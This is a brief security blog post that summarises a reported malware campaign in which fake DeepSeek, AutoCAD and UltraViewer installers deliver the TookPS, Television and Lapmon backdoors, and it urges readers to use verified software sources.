Ransomware, Security

5 Alarming Ways Fake AI and Business Tools are Deploying Backdoors into Your System

tuffbrownboy

Overview of the Cybersecurity Threat

Recent findings have underscored a sophisticated cyber-attack campaign using popular business applications such as DeepSeek, AutoCAD, and UltraViewer as decoys to distribute dangerous backdoors. These attacks, aimed at gaining unauthorized remote access, have alarmingly been spreading through bogus applications, masquerading as legitimate business tools.

Deep Dive into the Malware Campaign

According to Kaspersky’s latest blog post, the campaign involves multiple backdoors that can provide remote access to victims’ systems. These back doors are cleverly disseminated through several forged versions of well-known software tools.

The Fake Applications Leveraged

  • DeepSeek – A large-language model open-source AI replicated to spread TookPS backdoor.
  • AutoCAD and SketchUp – Targets through free downloads that initiate malicious scripts.
  • UltraViewer – Offered as a free tool but installs a loader retrieving dangerous scripts.

The Execution Process

The intricate attack involves initial scripts that download essential components and additional scripts that set up and run an SSH server. These actions establish a secured channel, enabling unauthorized access and command execution on the victim’s system.

Backdoors Deployed

  • Television – Known for its DLL sideloading and tampering with TeamViewer operations.
  • Lapmon – Another backdoor whose introduction method remains unidentified.

Impact and Implications

These phishing campaigns exploit the popularity and trusted nature of these applications to deceive users into installing malicious versions. Once installed, attackers can gain persistent access and potentially severe control over an individual’s or organization’s systems.

Conclusion and Safety Measures

While the reach of these campaigns continues to evolve, the importance of verifying the authenticity of downloaded applications has never been more crucial. Users and organizations must stay vigilant, employ robust cybersecurity practices, and rely only on verified sources for their software needs.

For more comprehensive insights into these attacks and recommended security measures, refer to the detailed analysis by Kaspersky included in their recent publications.

Related: 5 Alarming Ways Hunters International is Pivoting From Ransomware to Data Extortion

Last Updated: April 3, 2025

Post Views: 15

Related Posts